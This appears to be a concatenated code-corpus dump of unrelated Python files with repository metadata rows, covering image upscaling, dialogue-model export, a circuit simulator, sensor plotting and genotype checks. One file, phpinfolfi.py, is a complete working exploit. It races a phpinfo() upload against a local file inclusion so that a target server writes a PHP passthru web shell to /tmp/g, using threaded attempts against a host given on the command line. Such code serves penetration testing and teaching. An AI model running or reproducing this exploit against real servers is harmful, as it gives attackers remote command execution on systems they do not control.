              'RealESRGANv2-anime-xsx4 | RealESRGANv2-animevideo-xsx4-nousm | RealESRGANv2-animevideo-xsx4'))
    parser.add_argument('-o', '--output', type=str, default='results', help='Output folder')
    parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image')
    parser.add_argument('--suffix', type=str, default='out', help='Suffix of the restored image')
    parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing')
    parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding')
    parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border')
    parser.add_argument('--half', action='store_true', help='Use half precision during inference')
    parser.add_argument(
        '--alpha_upsampler',
        type=str,
        default='realesrgan',
        help='The upsampler for the alpha channels. Options: realesrgan | bicubic')
    parser.add_argument(
        '--ext',
        type=str,
        default='auto',
        help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs')
    parser.add_argument('--usecpu', action='store_true', help='True for use cpu in process')
    args = parser.parse_args()

    # determine models according to model names
    args.model_name = args.model_name.split('.')[0]
    if args.model_name in ['RealESRGAN_x4plus', 'RealESRNet_x4plus']:  # x4 RRDBNet model
        model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4)
        netscale = 4
    elif args.model_name in ['RealESRGAN_x4plus_anime_6B']:  # x4 RRDBNet model with 6 blocks
        model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
        netscale = 4
    elif args.model_name in ['RealESRGAN_x2plus', 'net_g_2x_200k']:  # x2 RRDBNet model
        model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2)
        netscale = 2
    elif args.model_name in [
            'RealESRGANv2-anime-xsx2', 'RealESRGANv2-animevideo-xsx2-nousm', 'RealESRGANv2-animevideo-xsx2'
    ]:  # x2 VGG-style model (XS size)
        model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=2, act_type='prelu')
        netscale = 2
    elif args.model_name in [
            'RealESRGANv2-anime-xsx4', 'RealESRGANv2-animevideo-xsx4-nousm', 'RealESRGANv2-animevideo-xsx4'
    ]:  # x4 VGG-style model (XS size)
        model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu')
        netscale = 4
    else:
        # Custom pretrained model: the name encodes the scale (token 2,
        # '1x'/'2x') and the RRDB block count (token 4, '6B'/'23B').
        print('Using custom pretrained model')
        model_arch = args.model_name.split('_')
        if model_arch[2] == '1x':
            scale = 1
            netscale = 1
        elif model_arch[2] == '2x':
            # BUGFIX: this branch previously copied the '1x' values
            # (scale = netscale = 1), so 2x custom models were built with
            # the wrong upsampling factor.
            scale = 2
            netscale = 2
        else:
            # Previously this only printed and fell through, crashing later
            # with a NameError on `scale`; fail fast with a clear error.
            raise ValueError('Invalid custom pretrained model: %s' % args.model_name)
        if model_arch[4] == '6B':
            num_block = 6
        elif model_arch[4] == '23B':
            num_block = 23
        else:
            raise ValueError('Invalid custom pretrained model: %s' % args.model_name)
        model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=num_block, num_grow_ch=32, scale=scale)

    # determine model paths (two conventional weight locations are checked)
    model_path = os.path.join('experiments/pretrained_models', args.model_name + '.pth')
    if not os.path.isfile(model_path):
        model_path = os.path.join('realesrgan/weights', args.model_name + '.pth')
    if not os.path.isfile(model_path):
        raise ValueError(f'Model {args.model_name} does not exist.')

    # restorer
    upsampler = RealESRGANer(
        scale=netscale,
        model_path=model_path,
        model=model,
        tile=args.tile,
        tile_pad=args.tile_pad,
        pre_pad=args.pre_pad,
        half=args.half,
        usecpu=args.usecpu)

    os.makedirs(args.output, exist_ok=True)
    if os.path.isfile(args.input):
        paths = [args.input]
    else:
        paths = sorted(glob.glob(os.path.join(args.input, '*')))

    total_start = time.time()
    print("Start time measure-------------------------------------------")
    for idx, path in enumerate(paths):
        imgname, extension = os.path.splitext(os.path.basename(path))
        print('Testing', idx, imgname)
        img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
        # A 4-channel image carries alpha and must be written as PNG below.
        if len(img.shape) == 3 and img.shape[2] == 4:
            img_mode = 'RGBA'
        else:
            img_mode = None
        try:
            one_img_start = time.time()
            output, _ = upsampler.enhance(img, outscale=args.outscale)
            print_elapsed_time('Done one image', one_img_start)
        except RuntimeError as error:
            print('Error', error)
            print('If you encounter CUDA out of memory, try to set --tile with a smaller number.')
        else:
            if args.ext == 'auto':
                extension = extension[1:]
            else:
                extension = args.ext
            if img_mode == 'RGBA':  # RGBA images should be saved in png format
                extension = 'png'
            save_path = os.path.join(args.output, f'{imgname}{args.suffix}.{extension}')
            cv2.imwrite(save_path, output)
    print_elapsed_time('Done all image', total_start)
# Script entry point (guard keeps imports side-effect free).
if __name__ == '__main__':
    main()
| 42.675497 | 115 | 0.63563 |
6c902d5fb8e7725b81d9433a9cc0afe42f4ab855 | 3,230 | py | Python | PaddleNLP/dialogue_system/auto_dialogue_evaluation/inference_model.py | lishiyu93/models | 5a41865d3b2a597ba703f0c57c8520f79ff74656 | [
"Apache-2.0"
] | 1 | 2020-05-19T01:24:17.000Z | 2020-05-19T01:24:17.000Z | PaddleNLP/dialogue_system/auto_dialogue_evaluation/inference_model.py | lishiyu93/models | 5a41865d3b2a597ba703f0c57c8520f79ff74656 | [
"Apache-2.0"
] | null | null | null | PaddleNLP/dialogue_system/auto_dialogue_evaluation/inference_model.py | lishiyu93/models | 5a41865d3b2a597ba703f0c57c8520f79ff74656 | [
"Apache-2.0"
] | 1 | 2018-06-27T10:14:19.000Z | 2018-06-27T10:14:19.000Z | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""save inference model for auto dialogue evaluation"""
import os
import sys
import six
import numpy as np
import time
import paddle
import paddle.fluid as fluid
import ade.reader as reader
from ade_net import create_net
from ade.utils.configure import PDConfig
from ade.utils.input_field import InputField
from ade.utils.model_check import check_cuda
def do_save_inference_model(args):
    """Build the evaluation network, restore trained weights, and export a
    deployable inference model to ``args.inference_model_dir``.

    Expects at least one of ``args.init_from_params`` /
    ``args.init_from_pretrain_model`` to be set (asserted below).
    """
    test_prog = fluid.default_main_program()
    startup_prog = fluid.default_startup_program()
    with fluid.program_guard(test_prog, startup_prog):
        test_prog.random_seed = args.random_seed
        startup_prog.random_seed = args.random_seed
        with fluid.unique_name.guard():
            # Inputs: context / response token-id sequences (lod_level=1 =>
            # variable-length) plus labels (unused at inference time).
            context_wordseq = fluid.data(
                name='context_wordseq',
                shape=[-1, 1],
                dtype='int64',
                lod_level=1)
            response_wordseq = fluid.data(
                name='response_wordseq',
                shape=[-1, 1],
                dtype='int64',
                lod_level=1)
            labels = fluid.data(name='labels', shape=[-1, 1], dtype='int64')
            input_inst = [context_wordseq, response_wordseq, labels]
            input_field = InputField(input_inst)
            # NOTE(review): data_reader is created but never used below.
            data_reader = fluid.io.DataLoader.from_generator(
                feed_list=input_inst, capacity=4, iterable=False)
            logits = create_net(
                is_training=False, model_input=input_field, args=args)
    if args.use_cuda:
        place = fluid.CUDAPlace(0)
    else:
        place = fluid.CPUPlace()
    exe = fluid.Executor(place)
    exe.run(startup_prog)
    # One of the two checkpoint sources must be provided.
    assert (args.init_from_params) or (args.init_from_pretrain_model)
    if args.init_from_params:
        fluid.load(test_prog, args.init_from_params)
    elif args.init_from_pretrain_model:
        fluid.load(test_prog, args.init_from_pretrain_model)
    # saving inference model
    fluid.io.save_inference_model(
        args.inference_model_dir,
        feeded_var_names=[
            input_field.context_wordseq.name,
            input_field.response_wordseq.name,
        ],
        target_vars=[logits, ],
        executor=exe,
        main_program=test_prog,
        model_filename="model.pdmodel",
        params_filename="params.pdparams")
    print("save inference model at %s" % (args.inference_model_dir))
if __name__ == "__main__":
args = PDConfig(yaml_file="./data/config/ade.yaml")
args.build()
check_cuda(args.use_cuda)
do_save_inference_model(args)
| 31.980198 | 165 | 0.654489 |
c369232fa4a8ce765945f77d5e581c0d73a345ea | 5,255 | py | Python | File Inclusion/phpinfolfi.py | hartoyob/PayloadsAllTheThings | 12ee5277636612865a12dbbb83175f157e1423f1 | [
"MIT"
] | 38,247 | 2016-11-22T14:35:27.000Z | 2022-03-31T21:17:44.000Z | File Inclusion/phpinfolfi.py | victorbonato/PayloadsAllTheThings | 210a2b308158e810b6b152e145947e0bd2a81f94 | [
"MIT"
] | 143 | 2017-02-21T06:10:43.000Z | 2022-03-24T21:57:12.000Z | File Inclusion/phpinfolfi.py | victorbonato/PayloadsAllTheThings | 210a2b308158e810b6b152e145947e0bd2a81f94 | [
"MIT"
] | 10,479 | 2017-01-12T14:34:55.000Z | 2022-03-31T23:07:52.000Z | #!/usr/bin/python
# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
# The following line is not required but supposedly optimizes code.
# However, this breaks on some Python 2 installations, where the future module version installed is > 0.16. This can be a pain to revert.
# from builtins import range
from __future__ import print_function
import sys
import threading
import socket
def setup(host, port):
    """Build the request templates used by the phpinfo/LFI race.

    Returns (phpinfo_request, tag, lfi_request_template).  The byte layout
    of these strings is significant (multipart boundary, explicit \\r line
    endings, padded headers), so they are kept verbatim.
    NOTE(review): ``port`` is accepted but never used -- the Host headers
    assume the default port.
    """
    TAG="Security Test"
    # PHP payload written into the uploaded temp file: drops /tmp/g, a
    # one-line passthru web shell.
    PAYLOAD="""%s\r
<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
    REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
    # Padding inflates the request so phpinfo() output is large/slow enough
    # to widen the race window before the temp upload is reaped.
    padding="A" * 5000
    REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
    #modify this to suit the LFI script
    LFIREQ="""GET /lfi.php?load=%s%%00 HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
    return (REQ1, TAG, LFIREQ)
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    """Race one phpinfo upload against one LFI request.

    Sends the padded multipart phpinfo request on one socket, scrapes the
    uploaded file's [tmp_name] path from the first ``offset`` bytes of the
    response, and immediately requests that path through the LFI on a
    second socket.  Returns the temp path on success, None otherwise.
    NOTE(review): if the server closes early, recv() returns "" and the
    length-based loop spins forever; sockets are also not closed on the
    early ``return None`` path.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s2.connect((host, port))
    s.send(phpinforeq)
    d = ""
    while len(d) < offset:
        d += s.recv(offset)
    try:
        i = d.index("[tmp_name] =>")
        # Path value starts 17 chars past the marker; 14 chars covers a
        # typical /tmp/phpXXXXXX name.
        fn = d[i+17:i+31]
    except ValueError:
        return None
    s2.send(lfireq % (fn, host))
    d = s2.recv(4096)
    s.close()
    s2.close()
    # Success when the LFI response echoes the tag planted by the payload.
    if d.find(tag) != -1:
        return fn
# Global number of race attempts made so far; incremented by workers while
# holding the shared lock (see ThreadWorker.run).
counter=0
class ThreadWorker(threading.Thread):
    """Worker thread that repeatedly attempts the phpinfo/LFI race.

    All workers share an Event (set on success or shutdown), a Lock
    guarding the global attempt ``counter``, and an attempt budget.  Any
    remaining constructor arguments are forwarded to phpInfoLFI().
    """
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e
        self.lock = l
        self.maxattempts = m
        self.args = args
    def run(self):
        global counter
        while not self.event.is_set():
            # Reserve one attempt under the lock; stop once the shared
            # budget is exhausted.
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter+=1
            try:
                x = phpInfoLFI(*self.args)
                if self.event.is_set():
                    break
                if x:
                    print("\nGot it! Shell created in /tmp/g")
                    # Signal every other worker to stop trying.
                    self.event.set()
            except socket.error:
                # Connection trouble: retire this worker quietly.
                return
def getOffset(host, port, phpinforeq):
    """Gets offset of tmp_name in the php output.

    Sends one full phpinfo request, reads the whole (chunked) response,
    then locates the [tmp_name] marker.  The returned offset is padded by
    256 bytes so later partial reads are sure to include the value.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    s.send(phpinforeq)
    d = ""
    while True:
        i = s.recv(4096)
        d+=i
        # "" means the server closed the connection.
        if i == "":
            break
        # detect the final chunk
        if i.endswith("0\r\n\r\n"):
            break
    s.close()
    i = d.find("[tmp_name] =>")
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")
    print("found %s at %i" % (d[i:i+10],i))
    # padded up a bit
    return i+256
def main():
    """Entry point: parse argv, probe the target, and run the worker pool.

    Usage: phpinfolfi.py host [port] [threads]
    """
    print("LFI With PHPInfo()")
    print("-=" * 30)
    if len(sys.argv) < 2:
        print("Usage: %s host [port] [threads]" % sys.argv[0])
        sys.exit(1)
    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error as e:
        print("Error with hostname %s: %s" % (sys.argv[1], e))
        sys.exit(1)
    port=80
    try:
        port = int(sys.argv[2])
    except IndexError:
        pass
    except ValueError as e:
        # BUGFIX: was "%d" % sys.argv[2], which raises TypeError because
        # the argument is the (non-numeric) string that failed int().
        print("Error with port %s: %s" % (sys.argv[2], e))
        sys.exit(1)
    poolsz=10
    try:
        poolsz = int(sys.argv[3])
    except IndexError:
        pass
    except ValueError as e:
        # BUGFIX: same %d-on-a-string problem as the port above.
        print("Error with poolsz %s: %s" % (sys.argv[3], e))
        sys.exit(1)
    print("Getting initial offset...", end=' ')
    reqphp, tag, reqlfi = setup(host, port)
    offset = getOffset(host, port, reqphp)
    sys.stdout.flush()
    maxattempts = 1000
    e = threading.Event()
    l = threading.Lock()
    print("Spawning worker pool (%d)..." % poolsz)
    sys.stdout.flush()
    tp = []
    for i in range(0,poolsz):
        tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
    for t in tp:
        t.start()
    try:
        # Poll once a second: show progress and stop on success or when the
        # shared attempt budget is spent.
        while not e.wait(1):
            if e.is_set():
                break
            with l:
                sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
                sys.stdout.flush()
            if counter >= maxattempts:
                break
        print()
        if e.is_set():
            print("Woot! \\m/")  # escaped: "\m" is an invalid escape sequence
        else:
            print(":(")
    except KeyboardInterrupt:
        print("\nTelling threads to shutdown...")
        e.set()
    print("Shuttin' down...")
    for t in tp:
        t.join()
if __name__=="__main__":
print("Don't forget to modify the LFI URL")
main()
| 26.675127 | 138 | 0.552807 |
b593c64a071b6643abda502a3cab49619e9d1eb5 | 587 | py | Python | ampel/model/time/UnixTimeModel.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | ampel/model/time/UnixTimeModel.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | ampel/model/time/UnixTimeModel.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: Ampel-core/ampel/model/time/UnixTimeModel.py
# License: BSD-3-Clause
# Author: valery brinnel <firstname.lastname@gmail.com>
# Date: 29.09.2018
# Last Modified Date: 06.06.2020
# Last Modified By: valery brinnel <firstname.lastname@gmail.com>
from typing import Literal
from ampel.base.AmpelBaseModel import AmpelBaseModel
class UnixTimeModel(AmpelBaseModel):
    """Time-constraint model whose value is already a unix timestamp."""
    # Discriminator selecting this model when parsing time-constraint configs.
    match_type: Literal['unix_time']
    # The unix timestamp (seconds since epoch).
    value: int
    def get_timestamp(self, **kwargs) -> int:
        """Return the configured unix timestamp (kwargs are ignored)."""
        return self.value
| 27.952381 | 68 | 0.674617 |
405dd67a91afef42bacc4e2ed5fae4884210c3c9 | 5,824 | py | Python | src/models/circuit.py | flyingbanana1024102/transmission-line-simulator | 101b771702791e29f6a1ce1bbcdac1de2ed82982 | [
"MIT"
] | null | null | null | src/models/circuit.py | flyingbanana1024102/transmission-line-simulator | 101b771702791e29f6a1ce1bbcdac1de2ed82982 | [
"MIT"
] | 4 | 2018-09-02T23:07:28.000Z | 2018-09-12T05:26:59.000Z | src/models/circuit.py | flyingbanana1024102/transmission-line-simulator | 101b771702791e29f6a1ce1bbcdac1de2ed82982 | [
"MIT"
] | null | null | null | #
# Transmission Line Simulator
#
# Author(s): Jiacong Xu
# Created: Jul-3-2017
#
from circuitelement import CircuitElement
from powersource import PowerSource
from resistor import Resistor
from oscilloscope import Oscilloscope
from util.constants import *
from wire import Wire
class Circuit(object):
    """
    An instance that describes exactly how the circuit is set up. A circuit
    consists of a list of resistors connected in series or in parallel.

    head: the first element of the circuit -- a singly linked list of
        circuit elements chained through their `next` pointers.
    headOscilloscope: head of a position-sorted, doubly linked list of
        Oscilloscope probes attached to the circuit.
    """
    def __init__(self):
        """
        Initializes a brand new circuit with a power source, single cable and a
        single load at the right.
        """
        source = PowerSource(10.0, 5.0, 1)
        cable = Wire(5.0, 1)
        load = Resistor(0.0)
        cable.length = 5.0
        source.next = cable
        cable.next = load
        self.head = source
        self.headOscilloscope = None
    def getLength(self):
        """
        Calculates and returns the length going from the power source to the
        load on the right, in meters.
        """
        # Walk to the last element; its `position` is the total length.
        p = 0
        e = self.head
        while e != None:
            p = e.position
            e = e.next
        return p
    def insertOscilloscope(self, pos):
        """
        Inserts a new oscilloscope at given circuit position (clamped to the
        circuit's extent). Returns the inserted item.
        """
        pos = max(0, min(self.getLength(), pos))
        o = Oscilloscope()
        o.position = pos
        self._insert(o)
        return o
    def splitWire(self, e, pos):
        """Split wire `e` at offset `pos` (relative to the wire's start)
        into two wires with the same impedance/speed, then re-associate
        every oscilloscope with whichever half now covers its position."""
        c = Wire(e.impedance, e.speed)
        c.length = e.length - pos
        c.next = e.next
        e.length = pos
        e.next = c
        # Now reset oscilloscopes' wire properties.
        o = self.headOscilloscope
        while o != None:
            if e.position <= o.position and e.position + e.length >= o.position:
                o.wire = e
            elif c.position <= o.position and c.position + c.length >= o.position:
                o.wire = c
            o = o.next
    def deleteWire(self, element):
        """Remove wire `element` from the circuit, deleting oscilloscopes
        that sat on it and shifting later oscilloscopes left by its length.

        NOTE(review): only `element.prev.next` is rewired here -- the
        `prev` pointer of `element.next` (if maintained for circuit
        elements elsewhere) is not updated; confirm against CircuitElement.
        """
        element.prev.next = element.next
        # Delete any oscilloscopes on this segment, and also changes positioning
        # for later oscilloscopes.
        h = self.headOscilloscope
        while h != None:
            if h.position > element.position:
                if h.position < element.position + element.length:
                    # Delete oscilloscope.
                    if h.prev != None:
                        h.prev.next = h.next
                    if h.next != None:
                        h.next.prev = h.prev
                    if h == self.headOscilloscope:
                        self.headOscilloscope = h.next
                else:
                    # Move oscilloscope.
                    h.position -= element.length
            h = h.next
    def moveOscilloscope(self, element, pos):
        """
        Moves the given oscilloscope to somewhere else.

        NOTE(review): the detach below does not clear `element.prev` /
        `element.next`, and the tail-append path in _insert() never writes
        `element.next` -- a moved oscilloscope can therefore keep a stale
        `next` pointer; confirm against Oscilloscope traversal code.
        """
        element.position = pos
        # First detach
        if element.prev != None:
            element.prev.next = element.next
        if element.next != None:
            element.next.prev = element.prev
        if self.headOscilloscope == element:
            self.headOscilloscope = element.next
        # Now reinsert
        self._insert(element)
    def checkOscilloscopes(self):
        """Drop oscilloscopes that now lie beyond the circuit's length
        (e.g. after a wire deletion) by truncating the list at them."""
        # Checks and removes out of bound osclloscopes.
        o = self.headOscilloscope
        l = self.getLength()
        while o != None:
            if o.position > l:
                if o.prev != None:
                    o.prev.next = None
                elif o == self.headOscilloscope:
                    self.headOscilloscope = None
            o = o.next
    def _insert(self, o):
        """Attach oscilloscope `o` to the wire covering its position and
        splice it into the position-sorted oscilloscope list."""
        # First determine wire
        e = self.head.next
        while e.next != None:
            if e.position <= o.position and e.position + e.length >= o.position:
                break
            e = e.next
        o.wire = e
        # Now insert into linked list.
        if self.headOscilloscope == None:
            self.headOscilloscope = o
            return
        h = self.headOscilloscope
        while h != None:
            if h.position > o.position:
                # Insert before h (possibly becoming the new head).
                if h.prev != None:
                    h.prev.next = o
                else:
                    self.headOscilloscope = o
                o.prev = h.prev
                h.prev = o
                o.next = h
                return
            elif h.next == None:
                # Append at the tail.
                h.next = o
                o.prev = h
                break
            h = h.next
    def getElements(self, position, isForward):
        """
        Returns the circuit elements positioned at the given position.

        position: the discretized position along the circuit, in meters.
        isForward: whether we are looking for junctions of elements going
        forward.
        """
        es = []
        e = self.head
        # One discretization step along the circuit.
        step = self.getLength() / DISCRETE_STEPS
        while e != None:
            if isForward:
                if position <= e.position and e.position < position + step:
                    es.append(e)
            else:
                if position >= e.position + e.length and e.position > position + e.length - step:
                    es.append(e)
            e = e.next
        if not isForward:
            es.reverse()
        return es
    def reset(self):
        """Reset every circuit element and every oscilloscope to its
        initial simulation state."""
        e = self.head
        while e != None:
            e.reset()
            e = e.next
        e = self.headOscilloscope
        while e != None:
            e.reset()
            e = e.next
| 25.432314 | 97 | 0.504293 |
77e62efaeab063a77fc142dab0ba15248b847f42 | 3,280 | py | Python | plot_sensor_csv.py | weightedEights/plot_sensor_csv | d84efec649464af409ef9f8a8c635aa06e00f449 | [
"MIT"
] | null | null | null | plot_sensor_csv.py | weightedEights/plot_sensor_csv | d84efec649464af409ef9f8a8c635aa06e00f449 | [
"MIT"
] | null | null | null | plot_sensor_csv.py | weightedEights/plot_sensor_csv | d84efec649464af409ef9f8a8c635aa06e00f449 | [
"MIT"
] | null | null | null | import os
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.style as pltstyle
from bokeh.plotting import figure, output_file, show
from bokeh.models import HoverTool
from bokeh.themes import built_in_themes
from bokeh.io import curdoc
dat_files_to_plot = ["temps_20190817.txt"]
def main():
# get data to plot
dat_list_to_plt = get_dat_to_plot(dat_files_to_plot)
# create pandas df time series
dat_df = df_from_dat_list(dat_list_to_plt)
print(dat_df.head())
# plot using pandas built-in
# maybe in future use bokeh
# pandas_plot(dat_df)
bokeh_plot(dat_df)
def get_dat_to_plot(file_list):
dat_list_paths = []
for file in file_list:
dat_list_paths.append(os.path.join("./data", file))
return dat_list_paths
def df_from_dat_list(dat_list):
# parse dates and use as index
dat_df = pd.read_csv(dat_list[0], parse_dates=True, index_col=0)
dat_df.rename_axis("date", axis="index", inplace=True)
dat_df.columns = ["temp_top", "temp_bottom"]
return dat_df
def pandas_plot(df):
plt.interactive(True)
# pltstyle.use('Solarize_Light2')
pltstyle.use('fivethirtyeight')
# pltstyle.use('ggplot')
# df["Temp_A"].plot(style='r-', linewidth=1.0, label="Top Shelf Temp")
# df["Temp_B"].plot(style='b-', linewidth=1.0, label="Bottom Shelf Temp")
ax = df.plot(style=['r-', 'b-'])
ax.legend(["Top Shelf Temp", "Bottom Shelf Temp"])
# get index of max value from Temp_A to annotate
# i_max_val = df.index.get_loc(df["Temp_A"]["2019-06-25 07":"2019-06-25 08"].idxmax())
# ax.annotate("Sleep system egress,\nurine bottle fill.",
# (df.index[i_max_val], df["Temp_A"][i_max_val]),
# xytext=(-240, 10),
# textcoords='offset points',
# arrowprops=dict(arrowstyle='-|>', lw=3, ec='r'))
# ax.grid(which='major', linestyle='-', linewidth='0.5')
# ax.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.title("Interior Temps, Orange Fish Hut #1")
plt.ylabel("Temp [$\degree$C]")
plt.xlabel("Date Time [UTC]")
plt.show(block=True)
def bokeh_plot(df):
# filtered_df = df[(df["temp_bottom"] > -25) & (df["temp_bottom"] < 20)]
output_file("interior_temps.html")
curdoc().theme = "caliber"
# curdoc().theme = "dark_minimal"
# curdoc().theme = "light_minimal"
solarized_red = "#dc322f"
solarized_blue = "#268bd2"
solarized_green = "#859900"
solarized_cyan = "#2aa198"
hover = HoverTool(
tooltips=[
("date", "@x{%Y-%m-%d %H:%M:%S}"),
("temp", "$y")
],
formatters={
"x": "datetime"
}
)
tools = [hover, 'box_zoom', 'save', 'reset']
p = figure(x_axis_type="datetime", plot_width=1600, plot_height=900, tools=tools)
p.line(x=df.index, y=df.iloc[:, 0], legend="Top Shelf Temp", line_width=2, color=solarized_red)
p.line(x=df.index, y=df.iloc[:, 1], legend="Bottom Shelf Temp", line_width=2, color=solarized_blue)
p.title.text = "Interior Temps, Orange Fish Hut #1"
p.yaxis.axis_label = "Temp [\N{DEGREE SIGN}C]"
p.xaxis.axis_label = "Date Time [UTC]"
show(p)
if __name__ == '__main__':
main()
| 27.333333 | 103 | 0.630488 |
963a8c2a461630b959b31ef091946a011cc71411 | 586 | py | Python | src/powergslb/server/http/handler/abstract.py | fyanuar/powergslb | 7dae75fd89017ef77385d15fde8c931b8436db92 | [
"MIT"
] | 81 | 2016-01-21T12:02:39.000Z | 2022-02-11T13:07:07.000Z | src/powergslb/server/http/handler/abstract.py | fyanuar/powergslb | 7dae75fd89017ef77385d15fde8c931b8436db92 | [
"MIT"
] | 24 | 2017-03-05T00:12:49.000Z | 2022-01-18T12:34:32.000Z | src/powergslb/server/http/handler/abstract.py | fyanuar/powergslb | 7dae75fd89017ef77385d15fde8c931b8436db92 | [
"MIT"
] | 28 | 2017-04-28T17:16:29.000Z | 2022-02-16T04:49:23.000Z | import abc
__all__ = ['AbstractContentHandler']
class AbstractContentHandler(object):
    """Base class for HTTP content handlers.

    Construction snapshots the relevant request state off the dispatching
    request handler; subclasses must implement content().
    """
    # Python 2 style ABC declaration (on Python 3 this attribute is ignored
    # and `metaclass=abc.ABCMeta` would be required); kept as-is for the
    # Python 2 runtime this file targets.
    __metaclass__ = abc.ABCMeta

    def __init__(self, request_handler):
        # Copy request routing/identity info...
        self.path = request_handler.path
        self.query = request_handler.query
        self.remote_ip = request_handler.remote_ip
        # ...the message payload...
        self.headers = request_handler.headers
        self.body = request_handler.body
        # ...and shared server resources.
        self.database = request_handler.database
        self.dirs = request_handler.dirs

    @abc.abstractmethod
    def content(self):
        """Produce the response content; must be overridden by subclasses."""
        pass
| 24.416667 | 50 | 0.6843 |
6198a3840b6e88f01c5e65bfeea62ad9db522569 | 3,919 | py | Python | assets/check_fingerprint_vcf.py | UMCUGenetics/DxNextflowMIP | ab4c3d006d38577a020ad848224f8ab208e83d79 | [
"MIT"
] | null | null | null | assets/check_fingerprint_vcf.py | UMCUGenetics/DxNextflowMIP | ab4c3d006d38577a020ad848224f8ab208e83d79 | [
"MIT"
] | null | null | null | assets/check_fingerprint_vcf.py | UMCUGenetics/DxNextflowMIP | ab4c3d006d38577a020ad848224f8ab208e83d79 | [
"MIT"
] | null | null | null | import argparse
import os
import shutil
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Check fingerprint vcf files.')
parser.add_argument('fingerprint_vcf_files', type=argparse.FileType('r'), nargs='*', help='Fingerprint VCF')
arguments = parser.parse_args()
disapproved_folder = 'disapprovedVCFs'
approved_folder = 'approvedVCFs'
os.mkdir(disapproved_folder)
os.mkdir(approved_folder)
gender = ['M', 'F', 'O']
logbook = []
for vcf_file in arguments.fingerprint_vcf_files:
refcov = 0 # Total reference reads for all homozygous (1/1) calls
totalcov = 0 # Total coverage for all homozygous calls
homaltcount = 0 # Number of homozygous calls
ycount = 0 # Sum of coverage for two Y SNPs
lowcovcount = 0 # Number of SNPs with <15X coverage
disbalancecount = 0 # Number of heterozygous (0/1) calls with allelefrequency <0.2 or >0.8
for line in vcf_file:
if not line.startswith('#'):
line = line.split()
# Parse Genotype format
gt_format = line[8].split(':')
gt_index = gt_format.index('GT')
# Parse sample genotype
gt_values = line[9].split(':')
gt_value = gt_values[gt_index]
if line[0] == 'Y':
if gt_value != './.':
ycount += int(gt_values[gt_format.index('DP')])
elif gt_value == '1/1':
homaltcount += 1
if int(gt_values[gt_format.index('DP')]) < 15:
lowcovcount += 1
refcov += int(gt_values[gt_format.index('AD')].split(',')[0])
totalcov += int(gt_values[gt_format.index('DP')])
elif gt_value != '1/1':
if gt_value == './.':
lowcovcount += 1
elif gt_value == '0/0':
if int(gt_values[gt_format.index('DP')]) < 15:
lowcovcount += 1
else:
if int(gt_values[gt_format.index('DP')]) < 15:
lowcovcount += 1
if gt_value == '0/1':
af_value = int(gt_values[gt_format.index('AD')].split(',')[0]) / float(int(gt_values[gt_format.index('DP')]))
if af_value > 0.8 or af_value < 0.2:
disbalancecount += 1
contamination = refcov / float(totalcov)
result = vcf_file.name, str(lowcovcount), str(homaltcount), str(round(contamination, 6)), vcf_file.name[8], str(ycount), str(disbalancecount)
logbook.append(result)
if result[4] not in gender:
